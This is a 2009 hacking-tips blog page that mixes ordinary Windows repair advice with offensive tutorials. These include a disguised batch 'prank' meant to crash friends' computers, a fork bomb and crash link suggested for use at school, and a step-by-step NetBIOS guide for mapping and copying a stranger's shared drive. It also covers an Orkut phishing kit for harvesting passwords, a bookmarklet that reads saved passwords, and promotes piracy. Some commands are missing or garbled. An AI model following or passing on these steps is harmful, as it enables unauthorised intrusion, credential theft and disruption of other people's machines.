Join This Channel To Get Latest Phone Tips,Tricks,News,Network Security Course,Hacks etc. For Free on Your Mobile!! ... Join our Facebook Discussion Group -Regards Ankit

19 December 2009

Notepad hack/Prank

1.First you need to open Notepad.

2.Type in Notepad-
@echo off
goto :a

3.When you save, Go to "File", "Save As", and save it as "Internet Explorer.bat". Where it says "FileType" Select "All Files" or it wont work.

4.Remeber you can save it in any name you want as long as it ends witf----
.bat Remember, .bat

5.Next you need to change the icon

6.To do this you need to right click the Icon and go down to "Create Shortcut" and then rename it.Then right click it and go down to "Properties" and select "Change Icon". Choose the icon you want andclick it and then click "Apply".

7.Put the original Batch File in a random folder on the desktop. So they cant see it.

If you then double click it and it will Crash the computer.
I Recommend you do not do this on your computer.
This is very funny to do to friends.


Random Rotating Signature

This Tutorial will show you how to get a random/rotating signature everytime the page is refreshed..Lets Start:

1.First you have to go to and make a account
2. Enter the members area
3. select the button that says "Random Images"
4. Select add a new random image
5. Paste the source were the image(s) is hosted and press "Create" and continue until you get to a page That has a bunch of script
6. What you need to do now is take the code and edit it
Delete everything that is highlighted blue in the picture
[Image: tut1yf.png]
[Image: tut2e.png]
It should end up looking something like this
[Image: tut3c.png]
7. Now go to the user cp and edit your signature and paste the code you just edited.
8. Put the image code on your link to make it work [img]Your Link here[/img]
[Image: tut5.png]
9. Update your signature and you should see one of the images you added to your cutandpastescripts account.

Crash Your System: With Nothing But a URL!

I stumbled across this URL while surfing the internet This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM


Use This To Crash Your Systems At School or College...


09 December 2009

Shutdown Your Computer Really Fast(Without any Software or Program)

I found this Trick Somewhere so i m posting it here.It works for windows xp and cuts ur shutdown time to 5 seconds only....
Lets Start:
First Press ctrl+alt+del
This will bring up Task manager...
Now,go to shut down tab at top..
Press ctrl key and while holding it press turn off button...
that's all Your computer is shutdowned!!!!


05 December 2009

Windows XP Crackerz Edition

Windows XP SP3 Crackerz Edition | ISO | 128MB

Windows XP SP3 Crackerz Edition | ISO | 128MB
Windows XP - Crackerz Edition
You must have see many versions of Windowz like Awesome Edition/Darklite Edition etc

We have never seen a Crackerz Edition....

So i have made one...

It has WinASM and Cracking Toolkit by International Crackerz Union(ICU)

It is super fast and has only 14 process running after install

Here is a download link:-

To skip waiting time on rapidshare to download file.

Just write one line code of javascript:-

then press enter


03 December 2009



1- Private Character Editor
This program is for designing icons and Characters(Alphapet)
Click :start
Then :run

2- iExpress
This Program is for converting your files to EXCUTABLE files
Click : start
Then : run
type : iexpress

3-Disk Cleanup
This program used for cleaning harddisk to offer space
Click : start
Then : run
type : cleanmgr


4-Dr Watson
This program Is for repairing problems in Windows
Click : start
Then : run
type : drwtsn32

5-Windows Media Player 5.1
Opens the old media player
Click : start
Then : run
type : mplay32

Program ............. CODE
__________ __________

Character Map = charmap

DirectX diagnosis = dxdiag

Object Packager = packager

System Monitor = perfmon

Program Manager = progman

Remote Access phone book = rasphone

Registry Editor = regedt32

File siganture verification tool = sigverif

Volume Contro = sndvol32

System Configuration Editor = sysedit

Syskey = syskey

microsoft Telnet Client = telnet


Simplest Virus – The Fork Bomb

A virus (as you know) is a piece of code that does something that it shouldn't. It is a common misconception that you need a vast skill set to make these and that they are extremely complex however in reality they are as simple as sin to make which is why they are so damn annoying.

A Fork bomb is considered to be the smallest writable virus in the batch language and it is capable of being annoying and if launched on a home computer however on a server will probably result in a crash.
A fork bomb creates two instances which each create two instances and so on..the processes recursively fork, this "forks" the processor and jamm it completely until a crash occurs.
Here is how to make it
open up notepad and type:
and save it as fork.bat Yep..its a virus of just 5 characters :P .
On double clicking this file,it will lead to total CPU jam by opening about 500+ process of command prompt .


Get Free Live Tv In Reliance gsm.

Setting for real player:
1.Start real player.
2.Goto options -then settings.
3.Goto connection.
4. In proxy select no proxy.
5. In network select default apn as rcomwap or rmbworld.
6. Online time-unlimited
7.Lowest udp port-6970
8.Highest udp port -32000
9.Goto options-advanced setting.
10.Gprs bandwith-28.14 kbps
11.Egprs bw- 65.28 kbps
12.Umts bw- 268.80 kbps


27 November 2009

Change Drive Letter in Windows XP

How To Change Drive Letter in Windows XP

How to assign a drive letter

To assign a drive letter to a drive, a partition, or a volume, follow these steps:

1. Log on as Administrator or as a member of the Administrators group.
2. Click Start, click Control Panel, and then click Performance and Maintenance.

Note : If you do not see Performance and Maintenance, go to step 3. Performance and Maintenance appears in Control Panel only if you use Category view. If you use Classic view, Performance and Maintenance does not appear.

3. Click Administrative Tools, double-click Computer Management, and then click Disk Management in the left pane.

4. Right-click the drive, the partition, the logical drive, or the volume that you want to assign a drive letter to, and then click Change Drive Letter and Paths.

5. Click Add.

6. Click Assign the following drive letter if it is not already selected, and then either accept the default drive letter or click the drive letter that you want to use.

7. Click OK.

The drive letter is assigned to the drive, to the partition, or to the volume that you specified, and then that drive letter appears in the appropriate drive, partition, or volume in the Disk Management tool.


Newfolder Virus The Solution


Whenever I open a folder, another folder with the same name is created under it.


Your system is infected by a variant of Indonesian virus called Brontok/Rontokbro. It creates a sub-folder in a folder with same name. Most of the times it comes from mobile memory cards. Scan with a good anti-virus and remove the virus. Also download HijackThis and scan your system with it in Safe Mode, then fix following entries:


F2 - REG:system.ini: Shell=Explorer.exe SSVICHOSST.exe

O4 - HKCU\..\Run: [Yahoo Messengger] C:\WINDOWS\system32\SSVICHOSST.exe

O7 - HKCU\Software\Microsoft\Windows\Current Version\Policies\System, DisableRegedit=1

"Open with" when Click On Any Drive...THe Solution

Problem ::

Whenever I double-click on any drive in My Computer, “Open with” dialog box opens OR I get following error message:

Cannot find copy.exe. Make sure you have typed the name correctly and then try again.


Enable “Show hidden files” option in “Tools -> Folder Options” and then search for “Autorun.inf” file in all drivers and if you get them in root of any drive (e.g. in C:\, D:\ and so on), delete them.


Problem:Search Box Open On Clicking Drives

Double click opens search option
Double-clicking any drive opens search option

Solution 1:
That's a virus named as ravmon.exe and autorun.inf
Scan first with a good antivirus [Nod32 Recommanded]
then try this trick....

First show the hidden files and folders options then try this method

1. Go to Start-->run and type cmd then click ok

2. If u want to remove the infected file from c drive then type C: in command prompt and press enter

3. Type autorun.inf and press enter
autorun.inf file is opened

4. Now type "attrib autorun.inf -s -h -r" and press enter

5. Now delete the file by typing
"del autorun.inf" and press enter

6.Now type autorun.inf and press enter now, u will find no infected autorun.inf file.

7. same way do for all other drives then restart ur pc
Solution 2:

To resolve this problem, edit the registry to set the value data for the Default string value in the registry keys that are described in the "Cause" section of this article to none:
1. Start Registry Editor (Regedt32.exe).
2. Locate and then click the Default value under the following keys in the registry if this problem occurs with folders:
If this problem occurs with drives:
3. Click Modify on the Edit menu.
4. Type none in the Value data box, and then click OK.
5. Quit Registry Editor.

orkut, firefox, youtube virus --- heap41a
orkut, firefox, youtube virus

removal procedure for orkut, firefox, youtube virus

when u r system effected, it show following messages when u open
orkut- Orkut is banned you fool, The administrators didnt write this program guess who did?? MUHAHAHA!!

to remove this do the following things
1.goto taskmanager-->processes find svchost.exe under your username (warning not a svchost.exe under system as username) end or kill these processes by pressing endprocess goto your "c" drive(where you installed your windows) then type "c:\heap41a" in address bar...(or delete through command prompt)
3. delete all the contents of the "c:\heap41a" folder open register editor by running "regedit" in run command menu( start-->run )
5.goto "edit" then "find" search for "heap41a" delete that key like "C:\heap41a\svchost.exe C:\heap(some number)\std.txt" close register editor...

Please apply these tricks only after a gud system scan (after removal of viruses).....otherwise the viruses/trojan processes will make these changes back...


Run Disabled by Admin

Run is disabled by adminstrator???
Following is the key which is responsible for it to work or not work



Look for 'NoRun' its a DWORD with default value of 00000000 (0).
In your case it could have been changed.
Change it to original default value...!

Suggestion: U can do it also by gpedit.msc!

1. Open Run n type gpedit.msc n hit enter...!
2. Go to the left pannel : "User Configuration > Administrative Templates > Start Menu and Taskbar > "
3. Towards ur right u'll find several options ....serach for.."Remove Run menu from Startmenu"...!
4. Disable it and if it is already set as not configured , enable it and then disable it .. !
5. U r now done....!



Get Your Old Pc Back After Attack Of Viruses

In today's world, most of the antiviruses are able to remove the viruses but what about tha changes caused by them to the system...

here im posting some changes which anti-viruses do not undo and we have to do them manually...

These are not discovered by me...but i collected them one-by-one and can be applied using diff methods possible...These r practically useful by most of the users and easily applicable...

PS: gpedit.msc is not available in windows xp home

Command Prompt Disabled

find gpedit.msc double click on that

goto user Configuration
select Administrative Templates
select System
on the right pane double click on "prevent access to the command prompt"
in the popup select "disabled" click on apply
then ok......


Open Registry Editor (Regedit.exe) and navigate to:


In the right-pane, double-click DisableCMD and set it's data to 0


Click on Start >> Run and in the Open box type:

REG add HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 0 /f

Type it in correctly. It is better to copy and paste. Then click OK.

Folder Options Disabled
go to run
type "control folders"
if it doesnt work, try:

Solution 1:

->Run -> Type gpedit.msc
->User Configuration ->Administrative Templates --> Windows Components --> Windows Explorer-> Removes the Folder Options menu item from the Tools menu.
Right click:
-> Properties -> Disable ->Apply -> Again set it to not configured

Solution 2:

Go to Startmenu->Run and enter regedit there and press ok to execute regedit (registry editor). There you’ll see a tree like structure of folders like stuff in left. There navigate to registry entry HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
and on right side you’ll see many values.

Out of these values in right see a value (key) named “NoFolderOptions” .Double click after highlighting it, if there under value box it’s written 1 then change it to 0 and press enter. Exit the registry editor and close any folder and open again to see the settings.If you want to disable Folder Options then set the value of “NoFolderOptions” to 1 (and to retrieve it back change it to 0).


Restore Deleted Recycle Bin Icon from Desktop

Method #1:

1. Right-click an empty area of your desktop
2. Select Properties
3. Click the Desktop tab
4. Click the Customize button
5. Click Restore Default
6. Exit all windows and restart your computer

Method #2:

Note: Be sure to make a backup copy of your registry prior to making any changes.

Go to Start>> Run. Type in: regedit [Enter]

Navigate to: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace

Hold the mouse on NameSpace and right-click once. From the resulting menu, select Edit>> New>> Key

Copy and Paste the following Key code (including the brackets):


Press Enter on your keyboard, exit the registry editor and restart your system.


Regedit Disabled By Admin The Solution

Regedit Disabled By Admin

Open Notepad pad, copy paste the following text to the note pad::


Save the text file as any name u with extension .reg

example:- "enable.reg"

After that double click to run the file.


No Stand By Icon Solution

Stand By Icon Disabled


I re-installed my windows and now "Stand By" option is greyed out in shutdown dialog box and I can't use it.

Sol: Install VGA drivers from your motherboard CD and the option will be enabled. If you don't have the motherboard CD, then goto the manufacturer site and downlaod the required drivers.

Blank User Accounts Applet Solution

Blank User Accounts Applet ::


When you double-click User Accounts applet in the Control Panel, the User Accounts applet opens, but it may be completely blank.

The buttons Back | Forward | Home are displayed in the dialog.


To resolve the problem, type these commands from Start, Run dialog:

regsvr32 jscript.dll

If that does not help, execute the following commands as well.

regsvr32 nusrmgr.cpl
regsvr32 /i mshtml.dll


Task Manager Disabled Solution

Using Group Policy Editor - for Windows XP Professional to Enable Task Manager.

* Click Start, Run, type gpedit.msc and click OK.
* Navigate to this branch:

User Configuration / Administrative Templates / System / Ctrl+Alt+Delete Options / Remove Task Manager

* Double-click the Remove Task Manager option.
* Set the policy to Not Configured.

Enable RegEdit [It is not tested]


Save the text file as any name u with extension .reg
example:- "enable.reg"
After that double click to run the file.



Hidden Folder Problem And Solution

1. I can't see Hidden files/folders in my computer. Even I enable the option "Show hidden files/folders" in "Tools -> Folder Options", its automtically disabled again.

Sol: Open regedit and goto:


In right-side pane, change value of "Hidden" to as following:

1 - To show hidden files
2 - To not show hidden files

If it doesnt work, then scan your computer with an anti-virus software.


Netbios Hack

NetBIOS Hacking-What is it?-
NetBIOS Hacking is the art of hacking into someone else’s computer through your computer. NetBIOS stands for “Network Basic Input Output System.” It is a way for a LAN or WAN to share folders, files, drives, and printers.

-How can this be of use to me?-
Most people don’t even know, but when they’re on a LAN or WAN they could possibly have their entire hard drive shared and not even know. So if we can find a way into the network, their computer is at our disposal.

-What do I need?-
Windows OS
Cain and Abel (
-[Step 1, Finding the target.]-
So first off we need to find a computer or the computer to hack into. So if your plugged in to the LAN, or connected to the WAN, you can begin. Open up Cain and Abel. This program has a built in sniffer feature. A sniffer looks for all IP addresses in the local subnet. Once you have opened up the program click on the sniffer tab, click the Start/Stop sniffer, and then click the blue cross

Another window will pop up, make sure “All host in my subnet” is selected, and then click ok.

It should begin to scan.

Then IP’s, computer names, and mac addresses will show up.
Now remember the IP address of the computer you are going to be breaking into.
If you can’t tell whether the IP address is a computer, router, modem, etc, that’s ok.
During the next step we will begin our trial and error.
-[Part 2, Trial and Error]-
Now, we don’t know if we have our designated target, or if we have a computer or printer, or whatever else is on the LAN or WAN.
If you did get the IP of the target though, I still recommend reading through this section, for it could be helpful later on.
Click on the start menu and go to run, type in cmd, and click ok.
This should bring up the command prompt.
From here we will do most of the hacking.
Now I will be referring to certain commands that need to be inputted into the command prompt.
I will put these commands in quotes, but do not put the quotes in the code when you type it into the prompt.
I am only doing this to avoid confusion.
Let’s get back to the hacking.
Type in “ping (IP address of the target).” For example in this tutorial, “ping”
This will tell us if the target is online.
If it worked, it will look something like this (note, I have colored out private information):

IF it didn’t work, meaning that the target is not online, it will look something like this:

If the target is not online, either switch to a different target, or try another time. If the target is online, then we can proceed.
-[Part 3, Gathering the Information.]-

Now, input this command “nbtstat –a (IP address of target).” An example would be “nbtstat –a”
This will show us if there is file sharing enabled, and if there is, it will give us the: currently logged on user, workgroup, and computer name.
Link Quebrado/Link para figura'" oncontextmenu="if(aa44==0){if(imgh44>imgw44){document.getElementById('bfimg44').height=imgh44};if(imgw44>imgh44){document.getElementById('bfimg44').width=imgw44};aa44=1}else{if(this.height>200 && this.height>=this.width){this.height=200};if(this.width>200 && this.width>=this.height){this.width=200};aa44=0};return false" src="" style="" id="bfimg44" onload="aa44=0;imgh44=this.height;imgw44=this.width;if(this.height>200 && this.height>=this.width){this.height=200}else if(this.width>800 && this.width>=this.height){this.width=800;};'';document.getElementById('loadi44').style.display='none';" border="0">

Ok, you’re probably wondering, “What does all this mean to me?” Well, this is actually very important, without this, the hack would not work. So, let me break it down from the top to bottom. I will just give the first line of information, and then explain the paragraph that follows it.

The information right below the original command says: “Local Area Connection,” this information tells us about our connection through the LAN, and in my case, I am not connected through LAN, so the host is not found, and there is no IP.
The information right below the “Local Area Connection,” is “Wireless Network Connection 2:” It gives us information about the connection to the target through WAN. In my case I am connected through the WAN, so it was able to find the Node IpAddress. The Node IpAddress is the local area IP of the computer you are going to break into.

The NetBIOS Remote Machine Name Table, give us the workgroup of our computer, tells us if it is shared, and gives us the computer name. Sometimes it will even give us the currently logged on user, but in my case, it didn’t. BATGIRL is the name of the computer I am trying to connect to. If you look to the right you should see a <20>. This means that file sharing is enabled on BATGIRL. If there was not a <20> to the right of the Name, then you have reached a dead end and need to go find another IP, or quit for now. Below BATGIRL is the computers workgroup, SUPERHEROES. If you are confused about which one is the workgroup, and the computer, look under the Type category to the right of the < > for every Name. If it says UNIQUE, it is one system, such as a printer or computer. If it is GROUP, then it is the workgroup
-[Step 4, Breaking In]-

Finally it’s time.
By now we know: that our target is online, our target has file sharing, and our target’s computer name.
So it’s time to break in.
We will now locate the shared drives, folders, files, or printers. Type in “net view \\(IP Address of Target)”
An example for this tutorial would be: “net view \\”
Link Quebrado/Link para figura'" oncontextmenu="if(aa51==0){if(imgh51>imgw51){document.getElementById('bfimg51').height=imgh51};if(imgw51>imgh51){document.getElementById('bfimg51').width=imgw51};aa51=1}else{if(this.height>200 && this.height>=this.width){this.height=200};if(this.width>200 && this.width>=this.height){this.width=200};aa51=0};return false" src="" style="" id="bfimg51" onload="aa51=0;imgh51=this.height;imgw51=this.width;if(this.height>200 && this.height>=this.width){this.height=200}else if(this.width>800 && this.width>=this.height){this.width=800;};'';document.getElementById('loadi51').style.display='none';" border="0">
We have our just found our share name. In this case, under the share name is “C,” meaning that the only shared thing on the computer is C. Then to the right, under Type, it says “Disk.” This means that it is the actual C DISK of the computer. The C DISK can sometimes be an entire person’s hard drive.
Link Quebrado/Link para figura'" oncontextmenu="if(aa55==0){if(imgh55>imgw55){document.getElementById('bfimg55').height=imgh55};if(imgw55>imgh55){document.getElementById('bfimg55').width=imgw55};aa55=1}else{if(this.height>200 && this.height>=this.width){this.height=200};if(this.width>200 && this.width>=this.height){this.width=200};aa55=0};return false" src="" style="" id="bfimg55" onload="aa55=0;imgh55=this.height;imgw55=this.width;if(this.height>200 && this.height>=this.width){this.height=200}else if(this.width>800 && this.width>=this.height){this.width=800;};'';document.getElementById('loadi55').style.display='none';" border="0">
All's that is left to do is “map” the shared drive onto our computer. This means that we will make a drive on our computer, and all the contents of the targets computer can be accessed through our created network drive. Type in “net use K: \\(IP Address of Target)\(Shared Drive). For my example in this tutorial, “net use K: \\\C.” Ok, let’s say that you plan on doing this again to a different person, do u see the “K after “net use?” This is the letter of the drive that you are making on your computer. It can be any letter you wish, as long as the same letter is not in use by your computer. So it could be “net use G...,” for a different target.
As you can see, for my hack I have already used “K,” so I used “G” instead.
You may also do the same for multiple hacks.
If it worked, it will say “The command completed successfully.”
If not, you will have to go retrace you steps.
Now open up “my computer” under the start menu, and your newly created network drive should be there.
Link Quebrado/Link para figura'" oncontextmenu="if(aa56==0){if(imgh56>imgw56){document.getElementById('bfimg56').height=imgh56};if(imgw56>imgh56){document.getElementById('bfimg56').width=imgw56};aa56=1}else{if(this.height>200 && this.height>=this.width){this.height=200};if(this.width>200 && this.width>=this.height){this.width=200};aa56=0};return false" src="" style="" id="bfimg56" onload="aa56=0;imgh56=this.height;imgw56=this.width;if(this.height>200 && this.height>=this.width){this.height=200}else if(this.width>800 && this.width>=this.height){this.width=800;};'';document.getElementById('loadi56').style.display='none';" border="0" height="200">Now, if you disconnect from the WAN or LAN, you will not be able to access this drive, hence the name Network Drive.
The drive will not be deleted after you disconnect though, but you won’t be able to access it until you reconnect to the network.
So if you are doing this for the content of the drive, I recommend dragging the files and folders inside of the drive onto your computer,
because you never know if the target changes the sharing setting.
If you are just doing this to hack something, then go explore it and have some well deserved fun!

Congratulations! You’re DONE!

-Commands used in this tutorial:
NBTSTAT -a (IP Address of Target)
NET VIEW \\(IP Address of Target)
NET USE K: \\(IP Address of Target)\(SHARENAME)


26 November 2009

Flooding Your Fanlist In Orkut...

Watch here:

For this Trick You must be a friend of Yourself..View This Tutorial..


25 November 2009

How To Testimonial Yourself In Orkut...

To Testimonial Yourself
Watch Here:

For this Trick You must be a friend of Yourself..View This Tutorial..


24 November 2009

Hacking Orkut Accounts ReloaDeD...

First Download This File:

Now Create An Account On

Unrar the Files and upload it to Server...

You will Get Passwords Like This:
Hack email password using orkut phishing
Now,Just Spread The link and When Someone Login There...You Will Get The Passwords!!!


23 November 2009

Orkut-Add Yourself As Fiend....


22 November 2009

How T0 BeAT A HaCk3r

For this Method we will need a keylogger server using ftp. It can be found on warez sites, youtube etc. You want to search for those bad programmed VB. programs(phishing), which sends your username and password to a FTP or Email server(eg: basically need the following things:


Tools needed:

1) Keylogger, passstealer

2) Cain and Abel

Execute the keylogger on your machine.

Now run Cain and Abel and do the folowing things as per stated order.

Wait for sometime and then check back the passwords area.

As you can see the keylogger used ftp protocol to tranfer the logs. Ftp protocol isn't very safe since it doesn't encrypt the data. Anyways you should see the ipaddress where your pc is sending packets. And also the username and password. This might not work if the server is using other protocol like http smtp etc you'll most probably get junk values in user and pass box if those protocols are used.

So open the ipaddress

Guess what its our very own =D. Now login using ftp password that we got from the sniffer and get going. I would recommend to steal the logs quietly like a ninja so you can get other's logs as well. Of course you can change the pass if you want but it won't send any further logs.

ope it helped the new guys like me. Will make better tuts in future.


Hacking An Ipod Touch۬۬

You'll need two key things: an iPod Touch (obviously) and a wireless network
with connectivity to the Internet

Getting an iPod Touch onto a wireless network is, most instances, a snap. Just go to Settings > Wi-Fi, switch Wi-Fi on (if it's not already on) and click on the name of the network you're connecting to. If it's a secure network -- these are listed with a padlock icon -- the Touch will prompt you for a password. This will be one keys listed on your router's wireless configuration pages. Once connected, verify that everything's working dandily by using Safari to surf the Web.

One way is to download BlackRa1n by Gehot, run it and you will have the option to install Cydia, Icy or Rock. You should install Cydia, then it is all jailbroken.

Here is another method:
The hack I'm demonstrating here only works on Touches running the 1.1.1 firmware. You can check which firmware you're currently running by going to Settings > General > About. If you're using a later version, read the next section to see how you can restore your firmware.

You'll need to find the 1.1.1 firmware if you want to try this hack

Downgrade to 1.1.1/Restore to unhacked state
You'll only need to follow the steps in this section if you need to downgrade to the 1.1.1 firmware or wish to restore your Touch to a pristine and unhacked state. Keep in mind that by doing this you'll wipe all the existing data on your iPod -- photos, videos, music, bookmarks, contacts, etc.

Firstly, you'll need to find out whether you've got a copy of the 1.1.1 firmware. On Windows machines, iPod firmware is generally stored in the folder C:\Documents and Settings\USER_NAME\Application Data\Apple Computer\iTunes\iPod Software Updates. Substitute your Windows login name for USER_NAME. The actual firmware file will be named something like iPod1,1_1.1.1_3A110a_Restore.ipsw. If you can't find, you'll need to search for it on the Internet.
Once you've located your copy of the 1.1.1 firmware, connect the Touch to your computer via USB. When iTunes starts up, click on your iPod Touch under the Devices tab along the left-hand side, and then hold down the Shift key (or the Option key for Mac users) while clicking on the Restore button. Navigate to where your firmware is stored and click OK. Within about five minutes you'll have a clean iPod running the 1.1.1 firmware.
Once your Touch has been hacked you can download apps, games and utilities. You can even skin the interface to your liking

Hacking the Touch
Now this is the easy part. Fire up the Touch's Safari Web browser and head to Scroll down the page and click on the big button labelled "Install AppSnapp". You'll now be dropped back to the main screen while the hack is applied and the appropriate code is downloaded. It shouldn't take more than a few minutes, so just sit back and twiddle your thumbs. Once everything's done and dusted, the "slide to unlock" screen will appear.
On the Touch's main screen, you'll now notice a new application called Installer. Click this to download and install applications developed for the iPhone and iPod Touch. Some applications developed for the iPhone won't work on the Touch -- namely anything that requires the iPhone's camera or cellular capabilities. Nonetheless there's a good range of games, wallpapers, skins and productivity software, as well as Linux software, available.

See what Google knows about you

Google released Google Dashboard which tells you “what Google knows about you”.

The dashboard lists some of the information associated with the Google services you use: your name, your email address, the number of contacts, the number of conversations in your Gmail inbox, your Google profile, the most recent entries from the web history etc. It’s a long answer to the question: “What does Google know about me?”.

If you have a Google account, you can login to Google Dashboard and you are presented with pretty much everything having to do with Google.

This is actually a pretty useful tool as it gives you a gateway all of your Google services. This is also a great tool for the paranoid because you can see what Google lets you know they know about you.


Hacker's Language

Many Of The Noob Hackers D0n't Understnd The Language Of Hackers...So Here it The Translation....


a b c d e f g h i j k l m n o p q r s t u v w x y z

translate to

4 8 c D 3 ph G h 1 j K l m N 0 p Q R 5 7 u V w X Y 2


a b c d e f g h i j k l m n o p q r 5 t u v w x y z

translate to{HARDEST ONE}

4 b ( |) 3 p|-| 9 |-| 1 _| |< |_ |\/| |\| o p (). .- 2 7 |_| v \/\/ >< `/ 2

letter a is now commonly replaced by @

hope it helps you.

if You Know More,,,,Please post Translations here....


Read out a password with a javascript code

Hello guys,

I am going to show you in a short tutorial how to read out a password of a web browser.


Password: **********

/ Hey! What's my password? (have no clue what could it be...Blush)

Alright, now you could read out the ******-stuff with a simple javascript code.


javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j.type.toLowerCase() == "password") s += f.value + "\n"; } } if (s) alert("Ankit Hacked The Passwords in on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

Hope it helps someone.


Security.....No One Can Beat U Now,

Hacker's Security.....No One Can Beat U Now,

(1)always scan your file at Do not distribute the sample or

(2) sandbox everything and use Anti-Malware

(3) make a vmw = vmware workstation

(4)use a keyscrambler in your vmware

(5)use firefox always delete Cookie and history after closing never save password

(6)if u are going to hack use a vpn- virtual privet network

(7) if your buying some software form a user make sure u research him
read his threads ask a friend. read the scam page.send the money as a gift on paypal.

(8)if something looks to good 2 be free well its not its most likely backed door

(9) never download form a telnet Nono= ppl with 10 post

(10) add a firewall in your vmware workstation and anti virus guard

(11) add a firewall anti virus guard on your pc outside your vmware workstation use a scrambler and a sandbox everything

(12) buy a 5tb External Hard Drive and back up everything ((scan file)) b4 adding

(13) one of the important factors in keeping tools undetected from anti viruses


31 October 2009

Free demonoid invitation coDeS

Hey guys ! this is an amazing website which can help you create free demonoid invitation codes but it take a lot of time(it's worth a try !).I got this amazing video at youtube and was quite useful though it is a slow process

First go to this site and then follow the given steps.

1.Create an account over there and do all the activation and stuff.
2.Then click on GEt an invite and this might take some days for you invitation to arrive !


All Converters From Allok

The package includes the following products:

1-Allok Video to FLV Converter:
Allok Video to FLV Converter is a powerful Flash Video Encoder to convert any video into SWF video and FLV streaming video formats.

2-Allok RM RMVB to AVI MPEG DVD Converter:
Allok RM RMVB to AVI MPEG DVD Converter is a powerful RealMedia converter software which can convert RM, RMVB to AVI, DivX, Xvid, MPEG1, MPEG2, VCD, SVCD, DVD, WMV, MP4, 3GP, FLV formats.

3-Allok Video Converter:
Allok Video Converter is an All-in-One video converting tool that can convert all video files to AVI, MPEG, WMV, MP4, H264, 3GP, FLV etc.

4-Allok Video Splitter:
Allok Video Splitter is a powerful tool to split, cut or trim large AVI, DivX, Xvid, MPEG, WMV, ASF, RM, MOV, 3GP, FLV or MP4 files into smaller clips in various format.

5-Allok Video to 3GP Converter:
Allok Video to 3GP Converter is a powerful and handy video converter for mobile phone and PDA. It can convert almost all video format, e.g. DivX, XviD, AVI, WMV, MPG, MPEG, MP4, M4V, FLV, 3GP, ASF, RM, RMVB, MOV, MOD, ASX, MKV, OGM, SVCD, VCD, VOB to 3GP, 3GP2, MP4, AVI Video format.

6-Allok Video to DVD Burner:
Allok Video to DVD Burner is an easy and professional DVD maker software that lets you convert all favorite movies to DVD movies and burning it onto DVD Disc, and then watch them on home DVD Player ,car DVD Player or any other portable DVD Player.

7-Allok Video Joiner:
Allok Video Joiner is a powerful tool to join or merge multiple AVI, Divx, XviD, MPEG, WMV, ASF, RM, MOV, MP4, 3GP, FLV files into one large file in various format.

Download From
Download From


Pure Codec 2009

The perfect decoding is one section can realize each kind of popular video frequency, the HDTV playbacking and the code versatile video and music decoding package, brings Media Player Classic, KMPlayer, the PotPlayer three section of popular players, supports Jan, under the British language platform to install, can broadcast audiences many kinds of form and so on AVI, VCD, DVD, MPG, MP4, RMVB, TS, TP, EVO, M2TS, MKV, OGM, MOV, SCM, CSF, FLV video and music documents. The recommendation installs the environment is Windows XP/Vista, Windows Media Player 11, does not support Windows 9X. If also uses with Realplayer, please when install do not choose the Real decoding module, QuickTime is similar.

The installment matters needing attention and install the parameter:

One. Before the installment, please first unload with this software function similar decoding package and the player (including old version perfect decoding), and installs as far as possible under English table of contents.

Two. If must support HD-DVD/BD VC1 Remux(TS) the broadcast, must promote to Windows Media Player 11 can decode the VC-1 video frequency (also to be possible to install its runtime alone, wmfdist11.exe which after only installs WMP11 installation procedure bale breaking, obtains).

Three. The perfect decoding issue is for the purpose of sharing, does not tie up any hoodlum/advertisement plug-in unit, if certain monitoring software reported mistakenly that it contains the hoodlum/advertisement plug-in unit, please “do not doubt by the personnel, doubts the human not to use” point of view processing, declared specially, should not be redundant the inquiry.

Four. The silent installment’s command line parameter is as follows: /S     – the silent installment (does not demonstrate user interface, if does not have other parameters, depends on system default language according to default setting installment default module) /D = way – to assign to install the table of contents the way Uses the above parameter to be possible to carry on simply has custom-made the installment, for example realizes the completely silent installment, and assigns to install the way is the E:Pure Codec form as follows (supposition perfect decoding document named PureCodec.exe):

PureCodec.exe /S /D =E:Pure Codec Renewal content: 20090826 – > 20091001 (the National Day commemorative edition)
- renews The KMPlayer 5 (EVR exaggeration support captions)
- to renew Daum PotPlayer 1.4.20129
- to renew Media Player Classic Homecinema 1.3.1290
- to renew Media Player Classic Homecinema Filters 1.3.1290
- to renew the RealPlayer 1 to decode the module
- to renew ffdshow rev3092 20090927 clsid
- to renew ATI VC-1 Video the Decoder 813
- to renew x264 Vfw Encoder 1259
- to renew MediaInfo 0.7.22
- renewal captions tool submux.exe and subresync.exe
- restores Monkey Audio DirectShow the Filter 4.06 modules (to be good to the APE support)
- the whole optimization to adjust and to revise some questions

Download From
Download From


02 October 2009


***************Please Do it at your own risk:****************
If you have installed Samsung PC Studio on your computer , follow step 1 else skip to step 2

Uninstall Samsung PC STUDIO 3 , if you have downloaded and installed. since no one gets installation CD within the package.

Uninstallation of PC studio won't delete the drivers installed. Go to Control Panel--> Add remove Programs-> uninstall each and every mobile driver of Samsung. After doing it , restart your P.C.

You need Mobile 1.0 drivers. You can download it from the following links. Use only 1 link. Multiple links are provided so that if one fails , other is up for you. It is a 1.20MB .rar File. Links for V_Mobile1.0Broadcommdriver.rar are:

Link1: Ziddu hosting link: or Click Here

Link2: Easy Share link : or Click Here

Link3:File Factory link: or Click here

****if no hosting link works , mail me at****

There is a file "setup" in the folder which you get after extractaction from V_Mobile1.0Broadcommdriver.rar file . Run Setup and drivers will automatically installed. Now after this process, attach your mobile with Pc. When you will attach mobile to PC , Mobile will prompt to select one from 3 options
1. Samsung Pc Studio
2. Media Player
3. Mass Storage

If it doesnot ask for these options , go to Menu-->Setting(#)-->Phone settings(4)-->PC Connections(5) and select ASK ON CONNECTION and reconnect the phone to pc.

Select Samsung PC studio in this step

You need FILE EXPLORER(pc version) for your phone and 1 java game to test it. You can download both in 1 package from the following links. Again there are 3 links , use 1 only. Other is added for your convienience

FE and Asphalt 3 from (513 KB) Will extraxt in 1.45 MB
or Click Here

Link2: and Asphalt 3 from
or Click here

or Click Here

Place folder Asphalt Urban to your C:\ drive or anyother drive. Dont put it on desktop. Remember the path where you have put Asphalt Urban Foleder

Install TK File explorer by running TKfileexplorer2.2.exe

